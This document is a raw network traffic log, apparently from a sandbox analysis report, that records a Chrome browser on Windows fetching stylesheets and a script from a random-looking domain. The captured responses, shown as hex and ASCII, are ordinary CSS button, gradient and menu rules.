2025-10-17 06:51:40 UTC	307	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:19 GMT ETag: "f23-64041ed57bc69" Accept-Ranges: bytes Content-Length: 3875 Vary: Accept-Encoding Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/css
2025-10-17 06:51:40 UTC	564	OUT	GET /css/show_new.css HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://xpoalswwkjddsljsy.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:40 UTC	310	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:19 GMT ETag: "12ec0-64041ed5db7ae" Accept-Ranges: bytes Content-Length: 77504 Vary: Accept-Encoding Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/css
2025-10-17 06:51:40 UTC	547	OUT	GET /js/browser.js HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://xpoalswwkjddsljsy.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:40 UTC	314	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:17 GMT ETag: "7b0-64041ed41c357" Accept-Ranges: bytes Content-Length: 1968 Vary: Accept-Encoding Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/javascript

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:40 UTC	563	OUT	GET /css/commons.css HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://xpoalswwkjddsljsy.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:40 UTC	312	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:18 GMT ETag: "2e9f8-64041ed522e84" Accept-Ranges: bytes Content-Length: 190968 Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/css
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 2e 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 6e 6f 4c 69 6e 6b 42 74 6e 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 47 72 65 79 42 6f 74 74 6f 6d 43 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 20 30 2c 72 67 62 61 28 33 2c 33 2c 33 2c 30 29 20 31 30 25 Data Ascii: @charset "utf-8";.button{display:inline-block;text-decoration:none;border:0;cursor:pointer;vertical-align:top;text-align:center}.noLinkBtn{cursor:default !important}.GreyBottomContainer{background:-moz-linear-gradient(top,rgba(0,0,0,0) 0,rgba(3,3,3,0) 10%
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 31 63 31 63 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 23 33 32 33 32 33 32 20 30 2c 23 31 63 31 63 31 63 20 31 30 30 25 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 73 74 72 3d 23 33 32 33 32 33 32 2c 65 6e 64 43 6f 6c 6f 72 73 74 72 3d 23 31 63 31 63 31 63 2c 47 72 61 64 69 65 6e 74 54 79 70 65 3d 30 29 7d 2e 61 72 72 6f 77 7b 63 6f 6e 74 65 6e 74 3a 27 27 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 2e 65 6c 6c 69 70 73 69 73 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 Data Ascii: 1c1c 100%);background:linear-gradient(to bottom,#323232 0,#1c1c1c 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#323232,endColorstr=#1c1c1c,GradientType=0)}.arrow{content:'';width:0;height:0;font-size:0}.ellipsis{white-space:nowrap
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 2c 30 2c 30 2e 38 34 29 20 30 2c 72 67 62 61 28 36 35 2c 36 35 2c 36 35 2c 30 2e 38 34 29 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 34 29 20 30 2c 72 67 62 61 28 36 35 2c 36 35 2c 36 35 2c 30 2e 38 34 29 20 31 30 30 25 29 7d 20 20 2e 73 65 63 74 69 6f 6e 5f 74 61 62 73 20 6c 69 2e 73 65 63 74 69 6f 6e 4d 6f 72 65 42 74 6e 20 61 3a 68 6f 76 65 72 2c 2e 73 65 63 74 69 6f 6e 5f 74 61 62 73 20 6c 69 20 61 3a 68 6f 76 65 72 2c 61 2e 73 65 63 74 69 6f 6e 4d 6f 72 65 42 74 6e 3a 68 6f 76 65 72 2c 2e 73 65 65 2d 61 6c 6c 2d 62 74 6e 20 61 3a 68 6f 76 65 72 2c 64 69 76 2e 77 72 61 70 70 65 72 2d 6d 61 69 6e 2d 6d 65 6e 75 2d Data Ascii: ,0,0.84) 0,rgba(65,65,65,0.84) 100%);background-image:linear-gradient(bottom,rgba(0,0,0,0.84) 0,rgba(65,65,65,0.84) 100%)} .section_tabs li.sectionMoreBtn a:hover,.section_tabs li a:hover,a.sectionMoreBtn:hover,.see-all-btn a:hover,div.wrapper-main-menu-
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 20 30 2c 72 67 62 61 28 31 32 35 2c 31 32 35 2c 31 32 35 2c 30 2e 36 39 29 20 31 30 30 25 29 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 20 20 2e 61 62 6f 76 65 50 6c 61 79 65 72 20 64 69 76 2e 62 74 6e 2d 73 75 62 73 63 72 69 62 65 7b 6d 61 72 67 69 6e 3a 30 7d 20 20 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 73 57 72 61 70 70 65 72 20 2e 62 74 6e 2d 73 75 62 73 63 72 69 62 65 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 31 32 70 78 7d 20 20 64 69 76 2e 62 74 6e 2d 73 75 62 73 63 72 69 62 65 2c 64 69 76 2e 62 74 6e 2d 73 75 62 73 63 72 69 62 65 2d 72 69 67 68 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 3a 30 20 37 70 78 7d 20 20 64 69 76 2e 62 74 6e 2d 73 75 62 73 63 72 69 62 65 20 73 70 61 6e 2c 64 Data Ascii: 0,rgba(125,125,125,0.69) 100%);text-decoration:none} .abovePlayer div.btn-subscribe{margin:0} .subscriptionsWrapper .btn-subscribe{margin:0 auto;width:112px} div.btn-subscribe,div.btn-subscribe-right{float:right;margin:0 7px} div.btn-subscribe span,d
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 2e 76 69 64 65 6f 2d 77 72 61 70 70 65 72 20 2e 76 69 64 65 6f 2d 61 63 74 69 6f 6e 73 2d 6d 65 6e 75 20 2e 74 61 62 2d 6d 65 6e 75 2d 77 72 61 70 70 65 72 2d 74 61 62 6c 65 20 2e 74 61 62 2d 6d 65 6e 75 2d 77 72 61 70 70 65 72 2d 72 6f 77 20 2e 74 61 62 2d 6d 65 6e 75 2d 77 72 61 70 70 65 72 2d 63 65 6c 6c 20 2e 74 61 62 2d 6d 65 6e 75 2d 69 74 65 6d 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 7d 20 20 2e 69 65 37 20 23 70 72 6f 66 69 6c 65 4d 65 6e 75 20 2e 62 74 6e 55 73 65 72 41 63 74 69 6f 6e 4d 65 6e 75 2c 2e 69 65 38 20 23 70 72 6f 66 69 6c 65 4d 65 6e 75 20 2e 62 74 6e 55 73 65 72 41 63 74 69 6f 6e 4d 65 6e 75 7b 6d 61 72 67 69 6e 3a 30 20 2d 32 70 78 20 30 20 30 7d 20 20 2e 69 65 39 20 23 70 72 6f 66 69 Data Ascii: .video-wrapper .video-actions-menu .tab-menu-wrapper-table .tab-menu-wrapper-row .tab-menu-wrapper-cell .tab-menu-item{float:left;margin-right:10px} .ie7 #profileMenu .btnUserActionMenu,.ie8 #profileMenu .btnUserActionMenu{margin:0 -2px 0 0} .ie9 #profi
2025-10-17 06:51:40 UTC	580	IN	Data Raw: 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 23 34 37 37 66 30 31 20 30 2c 23 34 37 37 66 30 31 20 32 2e 39 38 25 2c 23 37 62 62 62 32 37 20 39 39 2e 31 39 25 2c 23 37 62 62 62 32 37 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 23 34 37 37 66 30 31 20 30 2c 23 34 37 37 66 30 31 20 32 2e 39 38 25 2c 23 37 62 62 62 32 37 20 39 39 2e 31 39 25 2c 23 37 62 62 62 32 37 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 23 34 37 37 66 30 31 20 30 2c 23 34 37 37 66 30 31 20 32 2e 39 38 25 2c 23 37 62 62 62 32 37 20 39 39 2e 31 39 25 2c 23 37 62 62 62 32 37 20 31 30 30 25 29 7d 20 20 Data Ascii: r-gradient(bottom,#477f01 0,#477f01 2.98%,#7bbb27 99.19%,#7bbb27 100%);background:-webkit-linear-gradient(bottom,#477f01 0,#477f01 2.98%,#7bbb27 99.19%,#7bbb27 100%);background:linear-gradient(bottom,#477f01 0,#477f01 2.98%,#7bbb27 99.19%,#7bbb27 100%)}
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 67 68 74 3a 32 35 70 78 7d 20 20 2e 6c 61 6e 67 75 61 67 65 2d 64 65 20 2e 62 74 6e 55 73 65 72 41 63 74 69 6f 6e 4d 65 6e 75 20 61 20 73 70 61 6e 2e 62 74 6e 47 72 65 65 6e 2c 2e 6c 61 6e 67 75 61 67 65 2d 66 72 20 2e 62 74 6e 55 73 65 72 41 63 74 69 6f 6e 4d 65 6e 75 20 61 20 73 70 61 6e 2e 62 74 6e 47 72 65 65 6e 2c 2e 6c 61 6e 67 75 61 67 65 2d 65 73 20 2e 62 74 6e 55 73 65 72 41 63 74 69 6f 6e 4d 65 6e 75 20 61 20 73 70 61 6e 2e 62 74 6e 47 72 65 65 6e 2c 2e 6c 61 6e 67 75 61 67 65 2d 69 74 20 2e 62 74 6e 55 73 65 72 41 63 74 69 6f 6e 4d 65 6e 75 20 61 20 73 70 61 6e 2e 62 74 6e 47 72 65 65 6e 2c 2e 6c 61 6e 67 75 61 67 65 2d 70 74 20 2e 62 74 6e 55 73 65 72 41 63 74 69 6f 6e 4d 65 6e 75 20 61 20 73 70 61 6e 2e 62 74 6e 47 72 65 65 6e 2c 2e 6c 61 6e Data Ascii: ght:25px} .language-de .btnUserActionMenu a span.btnGreen,.language-fr .btnUserActionMenu a span.btnGreen,.language-es .btnUserActionMenu a span.btnGreen,.language-it .btnUserActionMenu a span.btnGreen,.language-pt .btnUserActionMenu a span.btnGreen,.lan
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 33 32 33 32 33 32 20 30 2c 23 31 65 31 65 31 65 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 30 2c 23 33 32 33 32 33 32 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 31 2c 23 31 65 31 65 31 65 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 33 32 33 32 33 32 20 30 2c 23 31 65 31 65 31 65 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 Data Ascii: und-image:-o-linear-gradient(top,#323232 0,#1e1e1e 100%);background-image:-webkit-gradient(linear,left top,left bottom,color-stop(0,#323232),color-stop(1,#1e1e1e));background-image:-webkit-linear-gradient(top,#323232 0,#1e1e1e 100%);background-image:linea
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 34 31 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 34 70 78 20 2d 32 35 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 77 69 64 74 68 3a 35 38 70 78 7d 20 20 2e 73 68 61 72 65 2d 62 6c 6f 63 6b 2d 70 74 20 6c 61 62 65 6c 2c 2e 73 68 61 72 65 2d 62 6c 6f 63 6b 2d 66 72 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 34 31 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 31 70 78 20 2d 38 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 77 69 64 74 68 3a 37 34 70 78 7d 20 20 2e 73 68 61 72 65 2d 69 63 6f 6e 73 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 36 31 70 78 3b 68 65 69 67 68 74 3a 35 Data Ascii: :block;padding:10px 41px;margin:-14px -25px;cursor:pointer;width:58px} .share-block-pt label,.share-block-fr label{display:block;padding:10px 41px;margin:-11px -8px !important;cursor:pointer;width:74px} .share-icons{margin:10px auto;width:561px;height:5
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 74 65 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 73 65 6c 65 63 74 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 38 34 70 78 20 2d 31 36 37 70 78 7d 20 20 64 69 76 2e 62 74 6e 2d 66 61 76 6f 72 69 74 65 20 61 2c 64 69 76 2e 62 74 6e 2d 66 61 76 6f 72 69 74 65 64 20 61 2c 64 69 76 2e 62 74 6e 2d 6d 6f 72 65 20 61 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 33 70 78 20 35 70 78 20 30 20 33 33 70 78 7d 20 20 64 69 76 2e 62 74 6e 2d 66 61 76 6f 72 69 74 65 20 61 3a 68 6f 76 65 72 2c 64 69 76 2e 62 74 6e 2d 66 61 76 6f 72 69 74 65 64 20 61 3a 68 6f 76 65 72 2c 64 69 76 2e 62 74 6e 2d 6d 6f 72 65 20 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 20 Data Ascii: te-main-icon-selected{background-position:-84px -167px} div.btn-favorite a,div.btn-favorited a,div.btn-more a{color:white;height:27px;padding:13px 5px 0 33px} div.btn-favorite a:hover,div.btn-favorited a:hover,div.btn-more a:hover{text-decoration:none}

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:40 UTC	569	OUT	GET /css/playlist-base.css HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://xpoalswwkjddsljsy.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:40 UTC	310	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:19 GMT ETag: "67fb-64041ed5b17cc" Accept-Ranges: bytes Content-Length: 26619 Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/css
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 2e 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 6e 6f 4c 69 6e 6b 42 74 6e 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 47 72 65 79 42 6f 74 74 6f 6d 43 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 20 30 2c 72 67 62 61 28 33 2c 33 2c 33 2c 30 29 20 31 30 25 2c 72 67 62 61 28 31 33 2c 31 33 2c 31 33 2c 30 2e Data Ascii: .button{display:inline-block;text-decoration:none;border:0;cursor:pointer;vertical-align:top;text-align:center}.noLinkBtn{cursor:default !important}.GreyBottomContainer{background:-moz-linear-gradient(top,rgba(0,0,0,0) 0,rgba(3,3,3,0) 10%,rgba(13,13,13,0.
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 23 33 32 33 32 33 32 20 30 2c 23 31 63 31 63 31 63 20 31 30 30 25 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 73 74 72 3d 23 33 32 33 32 33 32 2c 65 6e 64 43 6f 6c 6f 72 73 74 72 3d 23 31 63 31 63 31 63 2c 47 72 61 64 69 65 6e 74 54 79 70 65 3d 30 29 7d 2e 61 72 72 6f 77 7b 63 6f 6e 74 65 6e 74 3a 27 27 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 2e 65 6c 6c 69 70 73 69 73 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c Data Ascii: ound:linear-gradient(to bottom,#323232 0,#1c1c1c 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#323232,endColorstr=#1c1c1c,GradientType=0)}.arrow{content:'';width:0;height:0;font-size:0}.ellipsis{white-space:nowrap;text-overflow:el
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 34 29 20 30 2c 72 67 62 61 28 36 35 2c 36 35 2c 36 35 2c 30 2e 38 34 29 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 34 29 20 30 2c 72 67 62 61 28 36 35 2c 36 35 2c 36 35 2c 30 2e 38 34 29 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 34 29 20 30 2c 72 67 62 61 28 36 35 2c 36 35 2c 36 35 2c 30 2e 38 34 29 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 Data Ascii: m,rgba(0,0,0,0.84) 0,rgba(65,65,65,0.84) 100%);background-image:-o-linear-gradient(bottom,rgba(0,0,0,0.84) 0,rgba(65,65,65,0.84) 100%);background-image:-webkit-linear-gradient(bottom,rgba(0,0,0,0.84) 0,rgba(65,65,65,0.84) 100%);background-image:linear-gra
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 30 2c 30 2e 36 39 29 20 30 2c 72 67 62 61 28 31 32 35 2c 31 32 35 2c 31 32 35 2c 30 2e 36 39 29 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 36 39 29 20 30 2c 72 67 62 61 28 31 32 35 2c 31 32 35 2c 31 32 35 2c 30 2e 36 39 29 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 36 39 29 20 30 2c 72 67 62 61 28 31 32 35 2c 31 32 35 2c 31 32 35 2c 30 2e 36 39 29 20 31 30 30 25 29 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 20 20 2e 61 62 6f 76 65 50 6c 61 Data Ascii: 0,0.69) 0,rgba(125,125,125,0.69) 100%);background-image:-webkit-linear-gradient(bottom,rgba(0,0,0,0.69) 0,rgba(125,125,125,0.69) 100%);background-image:linear-gradient(bottom,rgba(0,0,0,0.69) 0,rgba(125,125,125,0.69) 100%);text-decoration:none} .abovePla
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 2d 69 74 65 6d 2c 2e 69 65 31 30 20 23 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 76 69 64 65 6f 2d 77 72 61 70 70 65 72 20 2e 76 69 64 65 6f 2d 61 63 74 69 6f 6e 73 2d 6d 65 6e 75 20 2e 74 61 62 2d 6d 65 6e 75 2d 77 72 61 70 70 65 72 2d 74 61 62 6c 65 20 2e 74 61 62 2d 6d 65 6e 75 2d 77 72 61 70 70 65 72 2d 72 6f 77 20 2e 74 61 62 2d 6d 65 6e 75 2d 77 72 61 70 70 65 72 2d 63 65 6c 6c 20 2e 74 61 62 2d 6d 65 6e 75 2d 69 74 65 6d 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 20 20 2e 69 65 37 20 23 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 76 69 64 65 6f 2d 77 72 61 70 70 65 72 20 2e 76 69 64 65 6f 2d 61 63 74 69 6f 6e 73 2d 6d 65 6e 75 20 2e 74 61 62 2d 6d 65 6e 75 2d 77 72 61 70 70 65 72 2d 74 61 62 6c 65 20 2e 74 61 62 2d Data Ascii: -item,.ie10 #main-container .video-wrapper .video-actions-menu .tab-menu-wrapper-table .tab-menu-wrapper-row .tab-menu-wrapper-cell .tab-menu-item{display:inline-block} .ie7 #main-container .video-wrapper .video-actions-menu .tab-menu-wrapper-table .tab-
2025-10-17 06:51:40 UTC	582	IN	Data Raw: 67 3a 38 70 78 20 32 31 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 30 20 72 67 62 61 28 32 39 2c 35 30 2c 31 2c 30 2e 33 37 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 37 62 62 62 32 37 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 23 34 37 37 66 30 31 20 30 2c 23 34 37 37 66 30 31 20 32 2e 39 38 25 2c 23 37 62 62 62 32 37 20 39 39 2e 31 39 25 2c 23 37 62 62 62 32 37 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 23 34 37 37 66 30 31 20 30 2c 23 34 37 37 66 30 31 20 32 2e 39 38 25 2c 23 37 62 62 62 32 37 20 39 39 2e 31 39 25 2c 23 37 62 62 62 32 37 Data Ascii: g:8px 21px !important;text-shadow:0 1px 0 rgba(29,50,1,0.37);background:#7bbb27;background:-moz-linear-gradient(bottom,#477f01 0,#477f01 2.98%,#7bbb27 99.19%,#7bbb27 100%);background:-o-linear-gradient(bottom,#477f01 0,#477f01 2.98%,#7bbb27 99.19%,#7bbb27
